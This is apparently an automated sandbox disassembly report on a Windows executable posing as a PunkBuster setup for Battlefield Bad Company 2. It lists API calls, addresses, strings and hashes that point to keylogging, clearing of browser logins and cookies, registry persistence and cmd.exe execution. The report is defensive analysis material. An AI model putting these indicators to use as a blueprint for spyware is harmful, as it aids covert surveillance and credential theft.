                                              • Opcode ID: ae59d5c511ced1d424170903cafecce15efe742eec3dbc4535d189b62bf81f0b
                                              • Instruction ID: 249664490226cffe886a95c969e3a1f1bb7c66dd1e282c0fdea98710dae82b57
                                              • Opcode Fuzzy Hash: ae59d5c511ced1d424170903cafecce15efe742eec3dbc4535d189b62bf81f0b
                                              • Instruction Fuzzy Hash: F231C270900259AFCB00DF95C8C5EAEB7B8AF44314F10456EF916E72D1C7749E45CBA5
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004070D2
                                                • Part of subcall function 00406A55: __EH_prolog.LIBCMT ref: 00406A5A
                                                • Part of subcall function 0040A632: __EH_prolog.LIBCMT ref: 0040A637
                                              Strings
                                              • Battlefield Bad Company 2, xrefs: 00407193
                                              • frame, xrefs: 004070E6
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 3, xrefs: 004071A4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 3$frame
                                              • API String ID: 3519838083-515625952
                                              • Opcode ID: cdc1f6182bd214d9045f9556bf90022187fa22f43cd70c14b82050586f43efeb
                                              • Instruction ID: b6a62f28c7b3057c80a3f56269876836a777f19cbbca4682d8e1b937b331a87d
                                              • Opcode Fuzzy Hash: cdc1f6182bd214d9045f9556bf90022187fa22f43cd70c14b82050586f43efeb
                                              • Instruction Fuzzy Hash: 1C31B670900288DFCB01DF64CC50BDEBBB4AF15304F1084BFE559A3291DB785A44CB69
                                              APIs
                                                • Part of subcall function 000CA876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 000CA884
                                                • Part of subcall function 000CA876: wsprintfW.USER32 ref: 000CA905
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 000CA691
                                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 000CA69D
                                              • CreateThread.KERNEL32(00000000,00000000,000C99C1,?,00000000,00000000), ref: 000CA6A9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTime$wsprintf
                                              • String ID: Online Keylogger Started
                                              • API String ID: 112202259-1258561607
                                              • Opcode ID: 166964d058b5de3d6ab50a6731417b682c72f6fc1c5cb00c9871afe597a29581
                                              • Instruction ID: ba081289d19e992492ac7536f5ee57a9480e753d13d042b58bdacf59c3593b73
                                              • Opcode Fuzzy Hash: 166964d058b5de3d6ab50a6731417b682c72f6fc1c5cb00c9871afe597a29581
                                              • Instruction Fuzzy Hash: 6B0196A17002187EE72077789CCBEFF7E6DCB833A8B44042DF54126583D9645D4682F2
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,000C4B26), ref: 000C4B40
                                              • CloseHandle.KERNEL32(?,?,?,?,000C4B26), ref: 000C4B98
                                              • SetEvent.KERNEL32(?,?,?,?,000C4B26), ref: 000C4BA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandleObjectSingleWait
                                              • String ID: Connection Timeout
                                              • API String ID: 2055531096-499159329
                                              • Opcode ID: 0286a41e0ad2f0dfa9e151531e2a8048e0b45e297ed5f18f3ef8718604b9ef98
                                              • Instruction ID: cdb5484681c9ae2a526f0c57e5757bcafe81be04be7219c3f973349f0905d243
                                              • Opcode Fuzzy Hash: 0286a41e0ad2f0dfa9e151531e2a8048e0b45e297ed5f18f3ef8718604b9ef98
                                              • Instruction Fuzzy Hash: FF012431A44B40EFD325AB398CA6A9EBFE5BF02310300092DF19342BA2CB30D8418B52
                                              APIs
                                              Strings
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 2, xrefs: 004097C9
                                              • Battlefield Bad Company 2, xrefs: 004097AC
                                              • PunkBuster Service Setup v%d.%d %s- Step 1 of 3, xrefs: 004097C2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 2$PunkBuster Service Setup v%d.%d %s- Step 1 of 3
                                              • API String ID: 3519838083-2774316313
                                              • Opcode ID: 3eed306f2d1d9ac54f449b40445fcb4ccd03e3b679d1554b8b83fbbae08ab14b
                                              • Instruction ID: a3b6ba2b4f641e5437b8940605f5d530bd99bbe82a93198287cab800592f0113
                                              • Opcode Fuzzy Hash: 3eed306f2d1d9ac54f449b40445fcb4ccd03e3b679d1554b8b83fbbae08ab14b
                                              • Instruction Fuzzy Hash: 48118EB0900208DFC700EB54C885FE973B4BB14704F0081BEA605A72E2DB785A85CB59
                                              Strings
                                              • C:\Users\user\Desktop\4wECQoBvYC.exe, xrefs: 000C6927
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe
                                              • API String ID: 0-4277792811
                                              • Opcode ID: 405257ec5948d270ccf5aa2f618fd2f8207e940d7338a48b6f9b02644a77fbb5
                                              • Instruction ID: e9c21ecf5376a299c0a8eb8803bd1ca6ecdc64701c40f6c7eb263272f86cfcc5
                                              • Opcode Fuzzy Hash: 405257ec5948d270ccf5aa2f618fd2f8207e940d7338a48b6f9b02644a77fbb5
                                              • Instruction Fuzzy Hash: 5EF0BB30741210ABDF2427747D29FBE3A9AE745356F004579F445E7A92DB3248818751
                                              APIs
                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,001342E0), ref: 000D277F
                                              • RegSetValueExW.ADVAPI32(001342E0,?,00000000,00000001,00000000,00000000,001342F8,?,000CE5CB,pth_unenc,001342E0), ref: 000D27AD
                                              • RegCloseKey.ADVAPI32(001342E0,?,000CE5CB,pth_unenc,001342E0), ref: 000D27B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: pth_unenc
                                              • API String ID: 1818849710-4028850238
                                              • Opcode ID: b0bf42da2bfcdbd5c9257ccbc8694f8642264dadb5db9879a04d2af2a17f25b6
                                              • Instruction ID: 08212ba28bc33e4a1178e1213bbb0b3e2f47fbc3a14523fd53218c8e1d8f0598
                                              • Opcode Fuzzy Hash: b0bf42da2bfcdbd5c9257ccbc8694f8642264dadb5db9879a04d2af2a17f25b6
                                              • Instruction Fuzzy Hash: BEF09071504218BBDF249FB0EE46FEE377CEF45750F108515F90296292E7719B04EA60
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000CCDC9
                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000CCE08
                                                • Part of subcall function 000F47BD: _Yarn.LIBCPMT ref: 000F47DC
                                                • Part of subcall function 000F47BD: _Yarn.LIBCPMT ref: 000F4800
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000CCE2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                              • String ID: bad locale name
                                              • API String ID: 3628047217-1405518554
                                              • Opcode ID: 207606ab9a4460380bf89e98b650284f602a890750af5e823eae6b6b3c51c440
                                              • Instruction ID: 6744b1505d92af0444704295074146fd903fc8c648f3e2de8f9a39f6adfa1dcd
                                              • Opcode Fuzzy Hash: 207606ab9a4460380bf89e98b650284f602a890750af5e823eae6b6b3c51c440
                                              • Instruction Fuzzy Hash: 0CF04F31400249EAC728FB20E857FDE77A4DF16750B90452CF506524E3EF30AA08C694
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,004BF718,004C27EB,00000000,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C,004BD4BE), ref: 004C318E
                                              • SetLastError.KERNEL32(00000000,?,?,?,0048B8FF,?,?,?,?,?,00401022,?,00000000), ref: 004C31F2
                                                • Part of subcall function 004BDC28: __lock.LIBCMT ref: 004BDC6C
                                                • Part of subcall function 004BDC28: HeapAlloc.KERNEL32(00000008,?,0050EEB0,00000010,004C31B4,00000001,0000008C,?,?,?,0048B8FF,?), ref: 004BDCAA
                                              • GetCurrentThreadId.KERNEL32 ref: 004C31DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: ErrorLast$AllocCurrentHeapThread__lock
                                              • String ID: pl
                                              • API String ID: 702879602-1786839575
                                              • Opcode ID: cb88780e55af28360521e8d65bb42ce1b6262d24d1d92811166b2b08986586a4
                                              • Instruction ID: 4e15fead1da765310891571215d60c9e77c149a2e6dfa2c0e8c96e45c1ec75c6
                                              • Opcode Fuzzy Hash: cb88780e55af28360521e8d65bb42ce1b6262d24d1d92811166b2b08986586a4
                                              • Instruction Fuzzy Hash: 38F0C835601751DFEB201F70AC49F563AA5EF04762B04462EF8429A2B1DF7989408B94
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00511168,00000010,004C27DA,00000000,00000FA0,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C), ref: 004CA454
                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 004CA464
                                              Strings
                                              • kernel32.dll, xrefs: 004CA44F
                                              • InitializeCriticalSectionAndSpinCount, xrefs: 004CA45E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                              • API String ID: 1646373207-3733552308
                                              • Opcode ID: 73cf7e5df0098c1c7d62d08b5aa5e6f9ae56e660d87144e9d257d9a9c70f2567
                                              • Instruction ID: e39fc0700cef1ff0848360b4e5987c70e5a34b69ece04a98e9f0bb628ab4d806
                                              • Opcode Fuzzy Hash: 73cf7e5df0098c1c7d62d08b5aa5e6f9ae56e660d87144e9d257d9a9c70f2567
                                              • Instruction Fuzzy Hash: 96F02438540789ABDB049FA4EC49B8D3AA1BB0070CB40826AE812D91A0E7B88590CB1E
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 000D51F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID: /C $cmd.exe$open
                                              • API String ID: 587946157-3896048727
                                              • Opcode ID: 39d4f960c4016b566d16a7f2a9497764bd7da49fa2d34244112897ccda02c51d
                                              • Instruction ID: 97232ba5d9c319a9ab57d8661bdb2c00ff30a3eb131e715f7221623c0240cd53
                                              • Opcode Fuzzy Hash: 39d4f960c4016b566d16a7f2a9497764bd7da49fa2d34244112897ccda02c51d
                                              • Instruction Fuzzy Hash: ADE06DB0108300ABCB08F760DCD6EFFB7ADAB95704F00482CB54392193DF70AE448615
                                              APIs
                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 000C143A
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C1441
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: GetCursorInfo$User32.dll
                                              • API String ID: 1646373207-2714051624
                                              • Opcode ID: a9b69a2f3cc2a19d0612cac031bc8c7a3c338d35341a84f609fb4d29428cf78e
                                              • Instruction ID: 1999c646091732b35fbdfce0bd3be08d004739c6417426724c19159cf8e6ad97
                                              • Opcode Fuzzy Hash: a9b69a2f3cc2a19d0612cac031bc8c7a3c338d35341a84f609fb4d29428cf78e
                                              • Instruction Fuzzy Hash: DAB092B854D3159BC6245BA0BE4E8493B34AB047023004141F44283BA0CB7410919A20
                                              APIs
                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 000C14DF
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C14E6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetLastInputInfo$User32.dll
                                              • API String ID: 2574300362-1519888992
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              APIs
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 004C100B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              Strings
                                              • [Cleared browsers logins and cookies.], xrefs: 000CB8DE
                                              • Cleared browsers logins and cookies., xrefs: 000CB8EF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                              • API String ID: 3472027048-1236744412
                                              APIs
                                                • Part of subcall function 000DB6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000DB6F6
                                                • Part of subcall function 000DB6E6: GetWindowTextLengthW.USER32(00000000), ref: 000DB6FF
                                                • Part of subcall function 000DB6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000DB729
                                              • Sleep.KERNEL32(000001F4), ref: 000C9C95
                                              • Sleep.KERNEL32(00000064), ref: 000C9D1F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$ForegroundLength
                                              • String ID: [ $ ]
                                              • API String ID: 3309952895-93608704
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 0041A487
                                              • GetWindowLongA.USER32(?,000000EB), ref: 0041A494
                                              • GetWindow.USER32(?,00000004), ref: 0041A4C7
                                              • GetParent.USER32(?), ref: 0041A4CE
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Window$LongMessageParentSend
                                              • String ID:
                                              • API String ID: 2571540958-0
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 000F810F
                                                • Part of subcall function 000F805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 000F808B
                                                • Part of subcall function 000F805C: ___AdjustPointer.LIBCMT ref: 000F80A6
                                              • _UnwindNestedFrames.LIBCMT ref: 000F8124
                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 000F8135
                                              • CallCatchBlock.LIBVCRUNTIME ref: 000F815D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                              • String ID:
                                              • API String ID: 737400349-0
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,001071B7,?,00000000,00000000,00000000,?,001074E3,00000006,FlsSetValue), ref: 00107242
                                              • GetLastError.KERNEL32(?,001071B7,?,00000000,00000000,00000000,?,001074E3,00000006,FlsSetValue,0011D328,FlsSetValue,00000000,00000364,?,00106F91), ref: 0010724E
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001071B7,?,00000000,00000000,00000000,?,001074E3,00000006,FlsSetValue,0011D328,FlsSetValue,00000000), ref: 0010725C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 000DB647
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000DB66C
                                              • CloseHandle.KERNEL32(00000000), ref: 000DB67A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleReadSize
                                              • String ID:
                                              • API String ID: 3919263394-0
                                              APIs
                                              • GetSystemMetrics.USER32(0000004C), ref: 000D8519
                                              • GetSystemMetrics.USER32(0000004D), ref: 000D851F
                                              • GetSystemMetrics.USER32(0000004E), ref: 000D8525
                                              • GetSystemMetrics.USER32(0000004F), ref: 000D852B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MetricsSystem
                                              • String ID:
                                              • API String ID: 4116985748-0
                                              APIs
                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 000DB395
                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 000DB3A8
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 000DB3D3
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 000DB3DB
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleOpenProcess
                                              • String ID:
                                              • API String ID: 39102293-0
                                              APIs
                                              • GetDC.USER32(00000000), ref: 0043C055
                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0043C06E
                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0043C07D
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0043C084
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
